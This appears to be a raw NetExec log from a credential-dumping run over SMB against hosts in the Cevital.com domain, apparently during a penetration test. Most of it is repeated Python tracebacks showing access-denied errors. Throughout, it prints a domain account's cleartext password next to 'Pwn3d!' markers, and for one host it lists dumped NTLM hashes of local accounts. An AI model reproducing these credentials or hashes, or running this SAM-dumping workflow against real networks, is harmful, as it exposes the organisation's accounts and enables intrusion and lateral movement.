│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied
SMB 10.34.174.23 445 OXOLT020064 [*] Dumping SAM hashes
SMB 10.34.174.38 445 OXODT020119 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:25:37] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.174.23 445 OXOLT020064


rootoxxo:500:aad3b435b51404eeaad3b435b51404ee:8d34de2a96b2d9c4a89478af030d136a:::
SMB 10.34.174.60 445 OXODT02070008 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.174.23 445 OXOLT020064
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.174.23 445 OXOLT020064
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.174.52 445 OXODT02010002 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:25:38] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.174.23 445 OXOLT020064


WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a091f8d5df27afd1218cad5878e
6c044:::
SMB 10.34.174.23 445 OXOLT020064 [+] Added 4 SAM hashes to the
database
SMB 10.34.174.79 445 OXODT020073 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:25:40] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.174.40 445 OXODT02060007 [+] Cevital.com\


oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:25:41] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied
SMB 10.34.174.68 445 OXODT02050001 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.174.63 445 OXODT020072 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:25:42] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.174.69 445 OXOLT020055 [+] Cevital.com\


oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:25:43] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.174.70 445 OXOLT020090 [+] Cevital.com\


oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:25:44] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied


smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied


smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.174.58 445 OXODT02020002 [+] Cevital.com\


oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:25:46] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

│ 926 │ │ rrp.hBaseRegCloseKey(self.__rrp, keyHandle)

│ 927 │ │ rrp.hBaseRegCloseKey(self.__rrp, regHandle)

│ 928 │ │ # Now let's open the remote file, so it can be
read later



│ /usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946
in hBaseRegSaveKey



│ 943 │ request['hKey'] = hKey

│ 944 │ request['lpFile'] = checkNullString(lpFile)

│ 945 │ request['pSecurityAttributes'] =
pSecurityAttributes

│ ❱ 946 │ return dce.request(request)

│ 947

│ 948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType,
lpData):

│ 949 │ request = BaseRegSetValue()




/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request



│ 879 │ │ │ │ │ exception =
sessionErrorClass(error_code = error_code)

│ 880 │ │ │ │ else:

│ 881 │ │ │ │ │ exception =
sessionErrorClass(packet = response, error_code =

│ error_code)

│ ❱ 882 │ │ │ raise exception

│ 883 │ │ else:

│ 884 │ │ │ response = respClass(answer, isNDR64 =
isNDR64)

│ 885 │ │ │ return response

╰──────────────────────────────────────────────────────────────────────────────────
─────────────────────────────────────────────────────────────────────────╯

DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.174.51 445 OXODT02040013 [+] Cevital.com\


oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.174.58 445 OXODT02020002 [*] Dumping SAM hashes
ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
╭────────────────────────────────────────────────────────────
Traceback (most recent call last)
────────────────────────────────────────────────────────────╮
│ /usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in
sam



│ 1493 │ │ │ add_sam_hash.sam_hashes = 0

│ 1494 │ │ │

│ 1495 │ │ │ if self.remote_ops and self.bootkey:

│ ❱ 1496 │ │ │ │ SAM_file_name =
self.remote_ops.saveSAM()

│ 1497 │ │ │ │ SAM = SAMHashes(

│ 1498 │ │ │ │ │ SAM_file_name,

│ 1499 │ │ │ │ │ self.bootkey,




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM



│ 931 │

│ 932 │ def saveSAM(self):

│ 933 │ │ LOG.debug('Saving remote SAM database')

│ ❱ 934 │ │ return self.__retrieveHive('SAM')

│ 935 │

│ 936 │ def saveSECURITY(self):

│ 937 │ │ LOG.debug('Saving remote SECURITY database')




/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in
__retrieveHive



│ 922 │ │ except:

│ 923 │ │ │ raise Exception("Can't open %s hive" %
hiveName)

│ 924 │ │ keyHandle = ans['phkResult']

│ ❱ 925 │ │ rrp.hBaseRegSaveKey(self.__rrp, keyHandle,
'..\\Temp\\'+tmpFileName)

